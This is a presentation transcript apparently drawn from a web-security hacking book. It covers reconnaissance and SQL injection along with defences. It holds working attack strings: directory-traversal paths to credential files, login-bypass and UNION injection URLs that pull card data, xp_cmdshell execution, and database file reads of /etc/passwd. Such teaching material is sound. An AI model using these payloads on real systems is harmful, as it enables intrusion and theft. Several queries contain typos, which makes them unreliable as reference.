HACKNOTES - Web Security

HACKNOTES - Web Security INSA, Kai

Hacking Techniques & Defenses • Web Hacking & Penetration Methodologies • Critical Hacks & Defenses

Web Hacking & Penetration Methodologies • Threats and Vulnerabilities • Profiling the Platform • Profiling the Application • Summary

THREATS AND VULNERABILITIES • Vulnerabilities • The platform – Linux, Windows, Apache, Oracle • The application – programming errors • SQL injection • Session hijacking

PROFILING THE PLATFORM • Web Server – Apache, IIS, Netscape • Application Server –Tomcat Servlet, PHP, ASP.NET • Database – Oracle, MSSQL, DB2, Infomix, Sybase.

Port Scanning and Service Identification • Nmap

Port Scanning and Service Identification • Scanline – fast but only perform SYN, ICMP and UDP scans

Port Scanning and Service Identification • Netcat & openssl openssl s_client –connect website:443 –cipher EXPORT40 openssl s_client –connect website:443 –cipher NULL openssl s_client –connect website:443 –cipher HIGH

Vulnerability scanning • Nikto & Nessus

Platform profile checklist • Identify the server’s role • Determine the operating system and version • Determine the operating system and application patch level • Scan for open ports • Record the web server type, patch level, and additional components • Research known vulnerabilities.

PROFILING THE APPLICATION • The next step is to profile the actual web site by systematically cataloging all of its pages, functions, and parameter. • To identify common problems such as poor input validation, inadequate session handling, and other programming errors.

Enumerate the Directory Structure and Files • Indexex, The easy part is going through the application and recording each file name and its full path from the web root. • Teleport, wget • libwhisker’s crawl function

Identify Authentication Mechanism Keep in mind that challenge/response mechanisms don’t protect passwords with 100 percent security

Identify Authorization Mechanism • Identify Authorization Tokens • http://website/index.php?id=allen&isadmin=false&menu=basic • If the request succeeds, then the application is vulnerable to • horizontal privilege escalation. • http://website/index.php?id=george&isadmin=false&menu=basic • If the request doesn’t receive administrator right, then user impersonation still works, • but the server tracks authorization in a parameter other than id. • Otherwise, the application performs the authorization check based on the username, • is vulnerable to horizontal and privilege escalation. • http://website/index.php?id=matt&isadmin=true&menu=full • if the request succeeds, then the application is vulnerable to • vertical privilege escalation. The attack required manipulating multiple tokens, • but the application still failed to enforce strong authorization checks. • http://website/index.php?id=matt&isadmin=falso&menu=full • if the request succeeds, then the application is vulnerable to • vertical privilege escalation. The application doesn’t perform any authorization • checks after the user has authenticated. • http://website/index.php?id=matt&isadmin=true&menu=basic • If the request succeeds, then application is vulnerable to vertical privilege escalation. • The application performs an authorization check on the isadmin parameter and • provides functionality according to the a value.

Protect Authorization • The best defense is to track as many user attributes on the server as possible. • Creating role-based access in a custom database table increases application overhead and maintenance; however, the security requirements of the application may require such a technique.

Identify All “Support” Files • style sheets (.css) • IIS files that are interpreted by specific ISAPI (internet server application programming interface) filters, such as .htr, .htx, .idc , .ida and .idq. • passwd.txt & global.asa • Nikto will identify these common files, but only in default locations.

Identify All Include Files • To identify an include file by search for the Server Side Include (SSI) tag. • Virtual • File • PHP • Log

Protect Include Files • Always use the language’s file suffix instead of .inc when naming include files. • If you’re using Apache::ASP, then you can either rename the files to .asp or modify the httpd.conf file • The <FilesMatch> trick <% This line will not be visible if the file suffix is .asp %> <!– This line will be visible regardless of the file suffix -->

Enumerate All Forms • The indicator of a form is the HTML <form> tag; how ever, the salient portions are the “input type” definitions: • Form-based authentication is also a primary target for brute-force password-guessing attacks. <INPUT TYPE=“hidden” NAME=“sess_id” VALUE=“ “> from APBoard <INPUT TYPE=“hidden” NAME=“postit” VALUE=“TRUE“> <INPUT TYPE=“hidden” NAME=“insertinto” VALUE=“1“> <INPUT TYPE=“hidden” NAME=“BoardID” VALUE=“1“> <INPUT CLASS=“button” TYPE=“sumit” NAME=“new_topic” VALUE=“Thema posten“> <INPUT CLASS=“button” TYPE=“sumit” NAME=“prefiew_topic” VALUE=“Vorschau“>

Enumerate All GET Parameters • Many applications track variables through URL parameters. The server sets these parameters based on user permission level, a user’s action, a session ID, or similar function. • This can point to the parameter’s function or its relation to session tracking, or it can generate informational errors. • Each GET parameter should also be tested for input validation and SQL injection attacks http://website/main.asp?menu=viewprofile viewprofile, user, welcome, admin, debug

method=POST Method = GET Protect Parameters • If the application uses GET parameters to track values then you might consider using POST request more often. • The parameters to a POST request will not show up in a browser’s history file or bookmarks.

Identify Vector forDirectory Attacks • Directory attacks: traversal and listing • Applications that use templating techniques • Typical attack • NULL (%00) character • Try this to bypass scripts that check for file extensions or automatically append characters to file names. • http://website/cgi-bin/bb-hostsvc.sh?HOSTSVC=www,website,com.cpu • http://website/servlet/webacc?User.html=index • http://website/ultraboard.pl?action=PrintableTopic&Post=42 • ../../../../etc/passwd • ../../conf/httpd.conf • ../../../../boot.ini • ../../../../winnt/repair/sam ../../etc/paswd%00html

Identify Areas that ProvideFile Upload Capability • File upload introduces several threats to the application • Malicious Content • File Overwrite • Denial of Service

Identify Errors • Two steps • Simply try to generate some errors in the application. • Identify what types of errors are generated on the server and how they are displayed to user. Inserting garbage characters deleting parameters inserting punctuation Did it return the server’s default HTTP 500 message? Is it a customized error page? Does an error return a custom page, but an HTTP 200 message? What information does the error contain? Can you identify path information? What about internal variables or references to other files? Is the error related to SQL queries?

Protect Error Messages • Errors can be caught in two locations • The web or application server • Change the content of these pages so that it does not include any server or application information. • The application itself • Make sure that the application has proper error-handling routines that default to a simple, innocuous error message.

Determine Which PagesRequire SSL • Replace all of the https:// references with http:// and see if the application still serves the page. • The server and application should be designed to ensure that sensitive files are transmitted via SSL.

Applicatoin Profile Checklist

SUMMARY • In order to full vet the security of an application, it must first be fully profiled. • This basically involves gathering as much information about the platform and the application. • A good profile of the application and knowledge of SQL can turn an innocuous error into a severe exploit.

2 Critical Hacks & Defenses • Generic Input Validation • Character Encoding • Alternate Request Methods • SQL Injection • Cross-site Scripting • Token Analysis • Session Attacks • XML-Based Services • Fundamental Application Defenses • Input Validation • Summary

GENERIC INPUT VALIDATION • Common input validation tests

GENERIC INPUT VALIDATION • Common input validation tests (cont.)

Common Vectors Consider these vector as well Example input Validation attack vectors

Source Disclosure • Certain input validation attacks manipulate the CGI’s file name in order to cause its source to be displayed in a user’s browser. • Java-based server engines seem to be most vulnerable to this type of validation attack • /foo.jsP • /foo.js%70 • /%3f.jsp (directory listing) • /foo.asp::$DATA • /foo.asp+.html

CHARACTER ENCODING • URL Encoding (Escaped Characters) • Unicode Mask: 1 1 0 0 0 0 b7 b6 1 b6 b5 b4 b3 b2 b1 b0 ---- first byte ------ ---- second byte --- Example: 0 0 1 0 1 1 1 1 (2F) b7 b6 b5 b4 b3 b2 b1b0 ------ one byte --------- Result: 1 1 0 0 0 0 0 0(C0) 1 0 1 0 1 1 1 1(AF) In url: %c0%af

Some Useful Unicode-Encoded Characters

ALTERNATE REQUEST METHODS • SPIKE proxy • http://www.immunitysec.com/resources-freesoftware.shtml • GET, POST, BROWSE, CONNECT, COPY, DELETE, HEAD, LOCK, MKCOL, MOVE, OPTIONS, PROPFIND, RPOPPATCH, PUT, SEARCH, TRACE, and UNLOCK.

SQL INJECTION URL = HTTP.GetFromUser(); user_id = URL.parameter(“user_id); password = URL.parameter(“password”); query = “SELECT name FROM userlist WHERE uid=‘” + user_id + “’AND pwd=‘” + password + “’;” database.connect(); result = databasae.execute(query); if resule HTTP.Send(“Login successful. Welcome, “ + result) IsAuthenticated = true; else HTTP.Send(“User ID or password is incorrect.”) isAuthenticated = false; end if if IsAuthenticated HTTP.Send(MainMenu) end if https://website/login.cgi?user_id=dcooper&password=diane https://website/login.cgi?user_id=dcooper’;%20--

SELECT Statement Manipulation • https://website/login.cgi?user_id=dcooper&password=‘%20OR%20”%3d’ • https://website/login.cgi?user_id=dcooper&password=foo%20OR%201%3d1 • https://website/login.cgi?user_id=‘%20OR%20’’%3d’&password=‘%20OR%20’’%3d’ • https://website/login.cgi?user_id=%25’;-- SELECt name FROM userlist WHERE uid=‘dcooper’ AND pwd=‘’ OR ‘’=‘’; SELECT name FROM userlist WHERE uid=dcooper AND pwd=foo OR 1=1; SELECT name FROM userlist WHERE uid=‘’ OR ‘’=‘’ AND pwd=‘’ OR ‘’=‘’; SELECT name FROM userlist WHERE uid=‘%’ ;--’ AND pwd=‘’;

Retrieve Arbitrary Data with SELECT plus UNION • SELECT value(s) FROM table WHERE clause_false UNION ALL SELECT value(s) FROM other_table WHERE clause_true https://website/login.cgi?user_id=foo&password=‘+UNION+ ALL+SELECT+uid,+pwd+FROM+userlist+WHERE+”%3d’ SELECT name FROM userlist WHERE uid=‘foo’ AND pwd=‘’ UNION ALL SELECT uid, pwd FROM userlist WHERE ‘’=‘’; https://website/login.cgi?user_id=foo&password=%27+UNION+ALL+ SELECT+first%5fname%2clast%fname%2cccard+FROM+store+ WHERE+%27%27%3d%27%27; SELECT name FROM userlist WHERE uid=‘foo’ AND pwd=‘’ UNION ALL SLEECT first_name,last_name,ccard FROM store WHERE ‘’=‘’; SELECT name FROM userlist WHERE uid=foo AND pwd=bar UNION ALL SELECT first name, last name, ccard FROM store WHERE 1=1;

Use INSERT to Modify Data • INSERT INTO user (User,Password) VALUES (‘albert’,’camus’); https://website/login.cgi?user_id=&password=%27;+INSERT+INTO+userlist+ %28uid%2cpassword%29+VALUES%28%27albert%27%2c%27camus%27%29;--+ SELECT name FROM userlist WHERE uid=‘’ AND pwd=‘’; INSERT INTO userlist (uid,password) VALUES (‘albert’,’camus’);-- ‘;

Salient Information for Common Databases

Common SQL Injection String

SQL Injection Countermeasures • Use strongly typed variables and database column definitions. • Assign query results to a strongly typed variable. • Limit data lengths. • Avoid creating queries via string concatenation. • Apply data separation and role-based access within the database. http://website/votw/analysis.asp?voteid=@@version Microsoft OLE DB Provider for SQL Server error ‘80040e57’ Arithmetic overflow error converting nvarchar to data type numeric. /vote/analysis.asp, line 19 “SELECT something FROM table WHERE” + varable…

Microsoft SQL Server • Insert a single quote (‘) into URL parameters and then examine the output, HTML source, or even the URL parameters for a tell-tale sign. • In addition to the slew of attacks that can be performed against any SQL-based database, MSSQL server contains a set of very powerful – and dangerous – commands. EXEC master.xp_cmdshell ‘command’ https://website/vuln.cgi?param=‘;xp_cmdshell+’ipconfig+/all’+;--

High-Risk Stored Procedures in MSSQL

Useful Objects and Variables

Oracle Informational Oracle parameters show parameters control_files; CREATE DIRECTORY somedir AS ‘/path/to/dir’; CREATE TABLE foo (bar varchars2(20)) ORGANIZATION EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY somedir LOCATION (‘somefile.dat’)); DECLARE fh UTL_FILE.FILE_TYPE; BEGIN fh := UTL_FILE.fopen(‘/some/dir’,’file.name’,’W’); -- wite UTL_FILE.PUTF(fh, somedata); UTL_FILE.FCLOSE(fh); END

MySQL – Read from the File System mysql> CREATE TABLE foo (bar TEXT); Query OK, 0 rows affected (0.02 sec) mysql> LOAD DATA INFILE ‘/etc/passwd’ INTO TABLE foo; Query OK, 27 rows affected (0.02 sec) Records: 27 Deleted: 0 Skipped: 0 Warnings: 0 mysql> SELECT * FROM foo; bar --------------------------------------------------------------------- root:x:0:0:root:/root:/bin/bash mike:x:500:500:mike:/home/mike:/bin/bash mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash https://website/vuln.cgi?param=%27;+CREATE+TABLE+foo+%28bar+TEXT%29; https://website/vuln.cgi?param=%27;+LOAD+DATA+INFILE+%27%2fetc%2fpasswd%27+INTO+TABLE+foo; https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+foo;

MySQL – Write to the File System Create a DoS By taking up disk space SELECT * FROM employees INTO OUTFILE ‘/tmp/foo’; https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+ employees+INTO+OUTFILE+%27%2ftmp/%2f..%08%27; [melnibone]$ ls –la /tmp drwxrwxrwx 8 root root 4096 jan 16 16:28 . drwxrwxrwx 19 root adm 4096 jan 16 14:03 .. drwxrwxrwx 1 mysql mysql 1269 jan 16 16:28 .. [melnibone]$ ls –la /tmp | cat -tve drwxrwxrwx 8 root root 4096 jan 16 16:28 ./$ drwxrwxrwx 19 root adm 4096 jan 16 14:03 ../$ drwxrwxrwx 1 mysql mysql 1269 jan 16 16:28 ..^H$

PostgreSQL – File Read/Write Access with COPY test=# CREATE TABLE foo (bar TEXT); CREATE test=# COPY foo FROM ‘/etc/passwd’; COPY test=# SELECT * FROM foo; bar --------------------------------------------------------------------- root:x:0:0:root:/root:/bin/bash mike:x:500:500:mike:/home/mike:/bin/bash mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash (27 rows) test=# COPY foo FROM ‘/var/lib/pgsql/data/pg_hba.conf’; COPY foo TO ‘/var/lib/pgsql/data/pg_hba.conf’; COPY foo TO ‘/tmp/table_data’; COPY pg_shadow TO ‘/tmp/foo’;

HACKNOTES - Web Security

HACKNOTES - Web Security

Presentation Transcript

Web Security

HACKNOTES - Web Security

Web Security

Web Security

Web Security

Web Security

WEB Security

Web security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security

Web Security